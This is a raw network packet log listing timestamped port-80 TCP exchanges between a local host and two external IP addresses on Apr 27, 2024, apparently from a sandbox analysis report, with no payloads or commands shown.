Apr 27, 2024 01:31:18.227231026 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:18.227252960 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 01:31:18.227274895 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:18.227289915 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:18.227325916 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 01:31:18.227363110 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 01:31:18.227401018 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:18.227425098 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 01:31:18.227462053 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:18.227463961 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:18.227502108 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 01:31:18.227544069 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 01:31:18.227591038 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 01:31:18.227606058 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 01:31:18.227644920 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 01:31:18.227662086 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 01:31:18.227700949 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:18.227721930 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 01:31:18.227751017 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:18.227756023 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:18.227797031 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 01:31:18.227833986 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 01:31:18.227869987 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 01:31:18.227895975 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 01:31:18.227917910 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 01:31:18.227955103 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 01:31:18.227991104 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:18.228017092 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 01:31:18.228029966 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:18.228050947 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:18.228089094 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:18.228142977 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:18.228146076 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:18.228180885 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:18.228219032 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:18.228256941 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:18.228266001 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:18.228295088 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:18.228331089 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:18.228368044 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:18.228369951 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:18.228400946 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:18.228409052 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:18.228446960 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:18.228481054 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:18.228486061 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:18.228523016 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:18.228562117 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:18.228563070 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:18.228600025 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:18.228606939 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:18.228637934 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:18.228676081 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:18.228703022 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:18.228713036 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:18.228750944 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:18.228810072 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:18.259641886 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:18.259677887 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:18.259701014 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:18.299762011 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:18.400729895 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 01:31:18.400790930 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 01:31:18.400825977 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 01:31:18.400865078 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 01:31:18.400899887 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 01:31:18.400963068 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 01:31:18.400985003 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 01:31:18.401011944 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 01:31:18.401043892 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 01:31:18.401081085 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 01:31:18.401103973 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 01:31:18.401133060 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 01:31:18.401160955 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 01:31:18.401199102 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 01:31:18.401236057 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 01:31:18.401256084 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 01:31:18.401279926 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 01:31:18.401316881 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 01:31:18.401355982 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 01:31:18.401380062 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 01:31:18.401396036 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 01:31:18.401433945 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 01:31:18.401472092 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 01:31:18.401501894 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 01:31:18.401520967 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 01:31:18.401550055 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 01:31:18.401587009 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 01:31:18.401629925 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 01:31:18.401648045 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 01:31:18.401668072 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 01:31:18.401705027 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 01:31:18.401746035 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 01:31:18.401766062 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 01:31:18.401782990 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 01:31:18.401819944 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 01:31:18.401869059 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 01:31:18.401885033 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 01:31:18.401907921 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 01:31:18.401907921 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 01:31:18.422909975 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:18.422951937 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:18.422990084 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:18.423021078 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:18.423031092 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:18.423069954 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:18.423096895 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:18.423109055 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:18.423146963 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:18.423166037 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:18.423187017 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:18.423223972 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:18.423261881 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:18.423263073 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:18.423302889 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:18.423310041 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:18.423341036 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:18.423378944 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:18.423415899 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:18.423429966 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:18.423454046 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:18.423461914 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:18.423491955 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:18.423528910 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:18.423556089 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:18.423569918 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:18.423609972 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:18.423620939 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:18.423649073 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:18.423686981 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:18.423693895 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:18.423727036 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:18.423763990 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:18.423774004 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:18.423801899 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:18.423840046 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:18.423877001 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:18.423883915 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:18.423916101 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:18.423927069 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:18.423955917 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:18.423993111 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:18.424010038 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:18.424034119 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:18.424072027 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:18.424098015 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:18.424135923 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:18.424174070 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:18.424185991 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:18.424213886 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:18.424252987 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:18.424268961 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:18.424290895 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:18.424329996 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:18.424348116 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:18.424369097 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:18.424407005 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:18.424418926 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:18.424446106 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:18.424487114 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:18.424499035 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:18.424525023 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:18.424562931 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:18.424573898 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:18.424659014 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:18.424698114 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:18.424735069 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:18.424757004 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:18.424772978 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:18.424777985 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:18.424812078 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:18.424849987 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:18.424870968 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:18.424889088 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:18.424926996 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:18.424968004 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:18.424973011 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:18.425004959 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:18.425009012 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:18.425044060 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:18.425082922 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:18.425096035 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:18.425122023 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:18.425159931 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:18.425198078 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:18.425204039 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:18.425236940 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:18.425250053 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:18.425275087 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:18.425312042 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:18.425323009 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:18.425352097 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:18.425390959 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:18.425400972 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:18.425431013 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:18.425467968 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:18.425493002 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:18.425504923 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:18.425540924 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:18.425554037 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:18.425581932 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:18.425620079 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:18.425626993 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:18.425659895 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:18.425698996 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:18.425709963 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:18.425739050 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:18.425780058 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:18.425789118 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:18.425818920 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:18.425856113 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:18.425906897 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:18.425918102 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:18.425951958 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:18.425966024 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:18.425991058 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:18.426029921 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:18.426043987 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:18.426069021 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:18.426106930 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:18.426141977 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:18.426142931 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:18.426175117 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:18.426181078 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:18.426219940 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:18.426258087 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:18.426276922 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:18.426295996 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:18.426333904 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:18.426350117 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:18.426373959 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:18.426413059 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:18.426450968 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:18.426455021 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:18.426490068 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:18.426491976 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:18.426527023 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:18.426565886 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:18.426603079 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:18.426604986 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:18.426644087 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:18.426682949 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:18.426693916 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:18.426722050 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:18.426727057 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:18.426763058 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:18.426800966 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:18.426839113 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:18.426868916 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:18.426877975 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:18.426891088 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:18.426915884 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:18.426954031 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:18.426990986 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:18.427000999 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:18.427030087 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:18.427037001 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:18.427067995 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:18.427107096 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:18.427119970 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:18.427145958 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:18.427182913 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:18.427217007 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:18.427221060 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:18.427259922 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:18.453803062 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:18.493813038 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:18.493868113 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:18.576225996 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 01:31:18.576294899 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 01:31:18.576349020 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 01:31:18.576373100 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 01:31:18.576400995 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 01:31:18.576430082 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 01:31:18.576545954 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 01:31:18.576565027 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 01:31:18.576620102 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 01:31:18.576719046 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 01:31:18.576738119 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 01:31:18.576766014 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 01:31:18.576792002 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 01:31:18.576972008 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 01:31:18.576989889 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 01:31:18.577007055 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 01:31:18.577020884 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 01:31:18.577059031 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 01:31:18.577157974 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 01:31:18.577212095 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 01:31:18.577229977 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 01:31:18.577248096 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 01:31:18.577291965 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 01:31:18.577416897 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 01:31:18.577459097 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 01:31:18.577559948 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 01:31:18.577599049 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 01:31:18.577758074 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 01:31:18.577775955 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 01:31:18.577814102 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 01:31:18.577825069 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 01:31:18.622277021 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:18.622337103 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:18.622375965 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:18.622381926 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:18.622416973 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:18.622454882 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:18.622493029 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:18.622513056 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:18.622533083 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:18.622535944 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:18.622580051 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:18.622621059 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:18.622651100 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:18.622658968 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:18.622700930 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:18.622708082 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:18.622740030 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:18.622781992 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:18.622791052 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:18.622843981 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:18.622895002 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:18.622900009 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:18.622939110 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:18.622977972 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:18.623024940 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:18.623047113 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:18.623090982 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:18.623096943 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:18.623131037 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:18.623172045 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:18.623203039 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:18.623210907 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:18.623249054 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:18.623256922 CEST	49734	80	192.168.2.4	176.97.76.106
